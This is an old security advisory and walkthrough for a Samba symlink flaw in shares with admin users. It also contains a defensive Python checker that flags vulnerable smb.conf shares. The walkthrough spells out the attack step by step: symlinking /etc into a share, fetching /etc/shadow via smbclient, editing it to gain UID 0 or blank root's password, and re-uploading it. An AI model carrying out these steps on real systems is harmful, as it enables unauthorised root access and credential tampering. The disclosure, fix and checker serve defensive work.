Title: Symlink attack in (all?) Samba
Released by: Tozz
Date: 14th December 2000
Symlink attack in (all?) Samba. - Local root walkthrough by Tozz



Requirements:

* Shell access or any other way to create symlinks
* A running Samba daemon
* The username and/or password of a user named in the admin users list of one or more shares
* Brains are not required.

By default, Samba (http://www.samba.org) follows symlinks, which can lead to root compromises. Here is an example:

I have a guy who sorts out all my uploads through SMB; he has 'admin' (admin users = username). This means he will work as UID 0 (root).

e.g. we have this share in /etc/smb.conf:

 path = /home/ftp/incoming
 comment = Uploads that came through anon ftp
 guest ok = no
 writeable = no
 force create mode = 0755
 force directory mode = 0755
 admin users = warezmaster

Log in to the shell, or find some other way to create symlinks, and create a symlink in /home/ftp/incoming. You do something like:

ln -s /etc

Now type on your box (local or remote both work):

smbclient //foobar.com/uploads -U warezmaster

It will ask for a password; enter it and you will get something like

There we go

smb: \> cd etc
smb: \> get shadow

[root@embrace /root]

Now you have downloaded the shadow file to your local box. Edit it: change your UID to 0, or remove the password from the root account (no password required at logon).

Log in with smbclient again:

smbclient //foobar.com/uploads -U warezmaster

Enter the password and re-upload:

smb: \> cd etc
smb: \> put shadow

That's it. Now log in to the shell: if you changed your own UID you are now root. If you removed the password from the root account, just su to it and you won't need a password.


The 'follow symlinks' option can be turned off, but it is on by default.


Fix: disable follow symlinks (follow symlinks = no in smb.conf).
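The dangerous combination in this advisory is a share with admin users set while follow symlinks is left at its default of yes. The following checker, added here and not part of the original advisory, reads an smb.conf and reports every such share; the [uploads] section name in the constructed sample is an assumption, since the advisory's listing lost its header line.

```python
import configparser

# Constructed sample modelled on the advisory's share; the [uploads] header is
# assumed (the listing lost it) and [public] is added to show the safe setting.
SAMPLE_SMB_CONF = """
[uploads]
   path = /home/ftp/incoming
   comment = Uploads that came through anon ftp
   guest ok = no
   writeable = no
   force create mode = 0755
   force directory mode = 0755
   admin users = warezmaster

[public]
   path = /srv/public
   admin users = warezmaster
   follow symlinks = no
"""
FALSE_VALUES = {"no", "false", "0"}

def parse_smb_conf(text):
    """smb.conf is INI-like: [section] headers, 'key = value' lines, '#'/';' comments."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return cp

def effective(cp, share, key, default):
    """Resolve a parameter like smbd: share section, then [global], then the built-in default."""
    globals_ = [s for s in cp.sections() if s.lower() == "global"]
    for name in [share] + globals_:
        if cp.has_option(name, key):
            return cp.get(name, key).strip().lower()
    return default

def risky_shares(text):
    """(share, admin users) pairs where admin users is set but follow symlinks is not disabled."""
    cp = parse_smb_conf(text)
    findings = []
    for share in cp.sections():
        if share.lower() == "global":
            continue
        admins = effective(cp, share, "admin users", "")
        # Built-in default for 'follow symlinks' is yes: the combination the advisory abuses.
        if admins and effective(cp, share, "follow symlinks", "yes") not in FALSE_VALUES:
            findings.append((share, admins))
    return findings
```

Run risky_shares over your own smb.conf text; any share it returns should get an explicit follow symlinks = no or have its admin users entry removed.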


Tozz (tozz@hackers4hackers.org)

You can contact me on AxeNet (irc.axenet.org, channel #axenet), nickname: Tozz,

or MemoServ me when I'm not online.

(C) 1999-2000 All rights reserved.